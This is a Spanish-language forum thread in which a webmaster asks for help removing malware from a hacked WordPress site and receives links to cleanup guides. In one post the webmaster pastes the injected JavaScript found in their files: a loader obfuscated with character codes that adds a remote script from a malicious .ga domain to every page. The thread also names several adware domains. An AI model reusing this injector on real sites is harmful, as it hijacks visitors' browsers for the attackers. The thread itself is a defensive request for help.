Soporte y Tecnología > Diseño & Webmaster Corner
Ayuda con sitio web infectado
GUANAQUISIMO:
Buenas tardes senores, como estan?
Les solicito ayuda a los duros en wordpress
mi sitio web salio infectado con unas vainas que en https://securityscan.getastra.com/malware-scanner?site=https%3A%2F%2Fsisdeagro.comme da la siguiente informacion
Suspicious:JS/hexlikeunknown detected in http://main.travelfornamewalking.ga/det.php?sit=flex&sid=3&yuid=1&/wp-includes/js/jquery/jquery_js&ver=1.12.4-wp at line 2
Yo deseo saber en qué archivo esta la infeccion,
alguien me ayude por favor
muchas gracias,
saludos!
xcero:
Saludos
Hay una guia para específicamente los ataques del tipo
--- Código: ---https://js.xxxxxxxxxx.ga/stat.js?n=ns1\' type
--- Fin del código ---
Lo que hacen hincapié , es que tomes tu taza de café y hagas tu backup por que debes de eliminar algunos archivos de tu capeta publica (public_html) , es decir detenidamente y de manera calmada
https://txnkaro.com/blog/how-to-clean-js-donatelloflowfirstly-ga-virus-from-wordpress-site/
Igual wordpress tiene su guia
https://wordpress.org/support/article/faq-my-site-was-hacked/
xcero:
A mi me detecta el Clas/Adware
https://callhimnamerstone.ga/
https://bitterblackwatter.ga
Cualquier hyperlink en el sitio sisdeagro.com se dirige a Adware
GUANAQUISIMO:
Buenas noches senores,
Fijense que el tutorial que me envio xcero me sirvio pero ahora el codigo malicioso no es el mismo sino que esta codificado en ASCII
--- Código: ---Element.prototype.appendAfter = function(element) {element.parentNode.insertBefore(this, element.nextSibling);}, false;(function() { var elem = document.createElement(String.fromCharCode(115,99,114,105,112,116)); elem.type = String.fromCharCode(116,101,120,116,47,106,97,118,97,115,99,114,105,112,116); elem.src = String.fromCharCode(104,116,116,112,115,58,47,47,105,114,99,46,108,111,118,101,103,114,101,101,110,112,101,110,99,105,108,115,46,103,97,47,115,116,97,116,46,106,115);elem.appendAfter(document.getElementsByTagName(String.fromCharCode(115,99,114,105,112,116))[0]);elem.appendAfter(document.getElementsByTagName(String.fromCharCode(104,101,97,100))[0]);document.getElementsByTagName(String.fromCharCode(104,101,97,100))[0].appendChild(elem);
--- Fin del código ---
Y resulta que todos los archivos .js o .json estan infectados (todos aparecen con permisos 777 tambien) los estoy removiendo manualmente (el código) pero son bastantes creo que mas de 200, la cosa es que tambien he seguido las sugerencias de la guia y espero poder removerlo, si puedo les cuento. :yao_ming: :yao_ming: :yao_ming:
Muchas gracias!
GUANAQUISIMO:
Aunque como puedo sustituir un texto en todos los archivos de una carpeta por ejemplo en wordpress? alguien me puede sugerir?
muchas gracias!
Navegación
[#] Página Siguiente
Ir a la versión completa